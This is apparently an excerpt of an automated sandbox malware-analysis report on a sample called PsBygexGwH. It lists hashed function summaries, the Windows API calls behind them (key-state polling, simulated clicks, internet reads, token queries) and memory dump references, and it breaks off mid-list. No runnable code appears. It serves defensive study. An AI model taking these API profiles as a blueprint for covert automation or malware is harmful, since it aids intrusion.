                                                          • Opcode ID: e680d26a94d4d692331f9896d796cb5cac8caab2aecd381db4b84b4f291ec1b4
                                                          • Instruction ID: 03acd67fdcc38661e90d0acacd53b56e49001a814afeea1338bdee48f1aa328d
                                                          • Opcode Fuzzy Hash: e680d26a94d4d692331f9896d796cb5cac8caab2aecd381db4b84b4f291ec1b4
                                                          • Instruction Fuzzy Hash: FA513A38604215DFCB15DF58D4848ADBBF1FF5A314F0980A8E806AB362DB31ED86CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 001B6C33
                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 001B6C4A
                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001B6C73
                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0019AB79,00000000,00000000), ref: 001B6C98
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001B6CC7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MessageSendShow
                                                          • String ID:
                                                          • API String ID: 3688381893-0
                                                          • Opcode ID: ce053e0144875691246ec997e93539c2e12a34c352006208e31f013cd9d4941c
                                                          • Instruction ID: e35679da99e9c8d664bee9d754d59fe077e09f004a6ac656e89997e609a382f9
                                                          • Opcode Fuzzy Hash: ce053e0144875691246ec997e93539c2e12a34c352006208e31f013cd9d4941c
                                                          • Instruction Fuzzy Hash: 2841D135A04104AFDB24CF28CD58FF97FA5EB1A360F150268F999A72E0C375ED41DA90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: f6452a5fff9e47357c9ca761220fdc1d0feeb621d01e5598f5295ed88d433e7d
                                                          • Instruction ID: 416124b841df13777450dec6639bd29060224b910582ccc1b2ec5e3b5c63c843
                                                          • Opcode Fuzzy Hash: f6452a5fff9e47357c9ca761220fdc1d0feeb621d01e5598f5295ed88d433e7d
                                                          • Instruction Fuzzy Hash: 8141AF37A00200DBCB24DFB8C981A5EB7E5EF8A314F154568E925EF391D731AD05CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00139141
                                                          • ScreenToClient.USER32(00000000,?), ref: 0013915E
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00139183
                                                          • GetAsyncKeyState.USER32(00000002), ref: 0013919D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 775e086697b4290b856614a1be82b7b3adafda63dffe8d898f1fc18443e3f803
                                                          • Instruction ID: be10393787921958c76a9243ae6df61b752ab107d756cfec660844cedc06ed7d
                                                          • Opcode Fuzzy Hash: 775e086697b4290b856614a1be82b7b3adafda63dffe8d898f1fc18443e3f803
                                                          • Instruction Fuzzy Hash: B5414D71A0861ABBDF19AF64C848BEEB774FB05330F208229E429A72D0C7706954CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetInputState.USER32 ref: 001938CB
                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00193922
                                                          • TranslateMessage.USER32(?), ref: 0019394B
                                                          • DispatchMessageW.USER32(?), ref: 00193955
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00193966
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                          • String ID:
                                                          • API String ID: 2256411358-0
                                                          • Opcode ID: 456e8bc4efc9832b1d7de24b47c6fb7d2d40ad3503d6485aeabcf168f27533ee
                                                          • Instruction ID: 21ca445df4ce71e50697d62c6098ff79a5a9ad6bf26b152abcadef87ffced3dd
                                                          • Opcode Fuzzy Hash: 456e8bc4efc9832b1d7de24b47c6fb7d2d40ad3503d6485aeabcf168f27533ee
                                                          • Instruction Fuzzy Hash: 7231A070904342EEEF39CB359848BB637E8AB15308F04066DE476C65E0E7B4AAC5CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0019CF38
                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 0019CF6F
                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,0019C21E,00000000), ref: 0019CFB4
                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0019C21E,00000000), ref: 0019CFC8
                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0019C21E,00000000), ref: 0019CFF2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                          • String ID:
                                                          • API String ID: 3191363074-0
                                                          • Opcode ID: 25adaa7c7d24f43648aaa8f77d740effa2c1a68e579fa64ae8d5fb8a74c21e39
                                                          • Instruction ID: ef79ab106f40d2d4d31b421cacef91f0be299bddb3cb57a326d98fae794749f0
                                                          • Opcode Fuzzy Hash: 25adaa7c7d24f43648aaa8f77d740effa2c1a68e579fa64ae8d5fb8a74c21e39
                                                          • Instruction Fuzzy Hash: C3315C71A00205EFDF24DFA5C884AABBBF9EB14350B10442EF556D2551EB30AE41DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00181915
                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 001819C1
                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 001819C9
                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 001819DA
                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001819E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: e6613b4e1809d7f876fe4ea4aaa16ae6ebc6a2aff38581e0f9ac426f70ba8b98
                                                          • Instruction ID: 3aa78051b2bafdfa586c10eb0d114f85c4237ce978e2c7698000357e19505e34
                                                          • Opcode Fuzzy Hash: e6613b4e1809d7f876fe4ea4aaa16ae6ebc6a2aff38581e0f9ac426f70ba8b98
                                                          • Instruction Fuzzy Hash: EE31AF72900219EFCB04DFA8C999AEE3BB9EB04319F104225F961A72D1C7709A45CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001B5745
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 001B579D
                                                          • _wcslen.LIBCMT ref: 001B57AF
                                                          • _wcslen.LIBCMT ref: 001B57BA
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001B5816
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_wcslen
                                                          • String ID:
                                                          • API String ID: 763830540-0
                                                          • Opcode ID: 1b7fe54324ee262a8513095f2a036cff4070b20cf2d8a69f805b10796685e8c7
                                                          • Instruction ID: 9dcbb9f436191895af41aa5cd7b0c3c649cc1fd6d222e64f1080c1343f32b2df
                                                          • Opcode Fuzzy Hash: 1b7fe54324ee262a8513095f2a036cff4070b20cf2d8a69f805b10796685e8c7
                                                          • Instruction Fuzzy Hash: 09217E71A04618EADB209FA0CC85BEE7BB9FF14724F108216E929EB1C0E7708985CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 001A0951
                                                          • GetForegroundWindow.USER32 ref: 001A0968
                                                          • GetDC.USER32(00000000), ref: 001A09A4
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 001A09B0
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 001A09E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: 26553b64ec76f6a4f92980e8413926bbda378e5d0d31f7bc3b324b2960b96cb5
                                                          • Instruction ID: 8d2c07717d48ff39a5bd8b3940080dc5767d85a7f61a93ab81c0ccdc94b4c5b9
                                                          • Opcode Fuzzy Hash: 26553b64ec76f6a4f92980e8413926bbda378e5d0d31f7bc3b324b2960b96cb5
                                                          • Instruction Fuzzy Hash: F7218135600214AFD704EF69DC85AAEBBE9EF59700F048168F84AD7752CB30AC44CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0015CDC6
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0015CDE9
                                                            • Part of subcall function 00153820: RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0015CE0F
                                                          • _free.LIBCMT ref: 0015CE22
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0015CE31
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: 524770535b68a61fe69a464cd1d3500be623d6fdc95ae2915f3b68ef9b694626
                                                          • Instruction ID: 4c8b7f35ac4f3a34da8458be75962dad3e0e69055e3191389b1632e6d2f5b44d
                                                          • Opcode Fuzzy Hash: 524770535b68a61fe69a464cd1d3500be623d6fdc95ae2915f3b68ef9b694626
                                                          • Instruction Fuzzy Hash: AE018872601315FF23211EBA6C4AD7B6D6DEFC6BA23150229FD25DB211DB618D0581F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00139693
                                                          • SelectObject.GDI32(?,00000000), ref: 001396A2
                                                          • BeginPath.GDI32(?), ref: 001396B9
                                                          • SelectObject.GDI32(?,00000000), ref: 001396E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 717b7a3f326e80fa57395db106ac17ac1ee8dac52a7cd9a30519f08eb7bc7b0f
                                                          • Instruction ID: 66f033f119b74d2bbe35aa450f98d1a9778d867bcac2d15b24d4778ca38fed07
                                                          • Opcode Fuzzy Hash: 717b7a3f326e80fa57395db106ac17ac1ee8dac52a7cd9a30519f08eb7bc7b0f
                                                          • Instruction Fuzzy Hash: F82149B0802305FBDB119F69ED1ABB93BA9BB50369F104216F814A65A0D3F098D1CFD4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 4312ec623ad871b1202d844ec497b57245c70f80a957ea37be25dce721705d93
                                                          • Instruction ID: fa45b8840f798960558b43a4ac483b5e1b72b5af8d9f8842a6250ea222d2cc0b
                                                          • Opcode Fuzzy Hash: 4312ec623ad871b1202d844ec497b57245c70f80a957ea37be25dce721705d93
                                                          • Instruction Fuzzy Hash: 5901B565641609BBE3086511DE82FFB735FEB313A4F808034FD049A242F760EE518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,0014F2DE,00153863,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6), ref: 00152DFD
                                                          • _free.LIBCMT ref: 00152E32
                                                          • _free.LIBCMT ref: 00152E59
                                                          • SetLastError.KERNEL32(00000000,00121129), ref: 00152E66
                                                          • SetLastError.KERNEL32(00000000,00121129), ref: 00152E6F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: bdaeff9b4c03e2cb07d9c81e2dd5576e1322a72976bfe59f255c714d50eac14b
                                                          • Instruction ID: 7b5e84f30c4ec3e6efb230651e096eb28a1927dd66cec39ac76df239d73eeb28
                                                          • Opcode Fuzzy Hash: bdaeff9b4c03e2cb07d9c81e2dd5576e1322a72976bfe59f255c714d50eac14b
                                                          • Instruction Fuzzy Hash: CE01F933105A00E7C61267746C87D6B2699EBE33A7B254129FC31AF292EF309C4D4160
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?,?,0018035E), ref: 0018002B
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180046
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180054
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?), ref: 00180064
                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180070
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: ed5c76a7100a61f89bd8f6366e0763f92e0eb5e4d652875ab9a0d7ba1e175fde
                                                          • Instruction ID: 99cd4d3f0baf23aee3093f49909608fb19cc76e8b708c4b3ce75199dd2274bf4
                                                          • Opcode Fuzzy Hash: ed5c76a7100a61f89bd8f6366e0763f92e0eb5e4d652875ab9a0d7ba1e175fde
                                                          • Instruction Fuzzy Hash: 6C01A272600208BFDB525F68DC44BAA7BEDEF48792F144228F905D6210D771DE849BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0018E997
                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0018E9A5
                                                          • Sleep.KERNEL32(00000000), ref: 0018E9AD
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0018E9B7
                                                          • Sleep.KERNEL32 ref: 0018E9F3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 7c5af8d79c94e826202b4f562fc6c0c4eb5b967f50fdbe8385fb3161419f858d
                                                          • Instruction ID: 83d4b9e9642f6b8bbb7738cecf30be5fe61e2eb1012446b9f5fcb7053f34edda
                                                          • Opcode Fuzzy Hash: 7c5af8d79c94e826202b4f562fc6c0c4eb5b967f50fdbe8385fb3161419f858d
                                                          • Instruction Fuzzy Hash: CF015E31D0162DDBCF04AFE9DD59AEDBBB8FF09705F010656E542B2241CB709694CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00181114
                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181120
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 0018112F
                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181136
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0018114D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: aef25387393d34d3494023d06166f34cea0ada117978144f5911d590db79ba01
                                                          • Instruction ID: b5087d913a52a4948e4922472d3f2c99c9dddde722b8b72a01a0be0637a50ccb
                                                          • Opcode Fuzzy Hash: aef25387393d34d3494023d06166f34cea0ada117978144f5911d590db79ba01
                                                          • Instruction Fuzzy Hash: 3C01697A200205BFDB115FA8DC4DAAA3B6EEF893A0B240419FA41D3360DB31DD408FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00180FCA
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00180FD6
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00180FE5
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00180FEC
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00181002
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
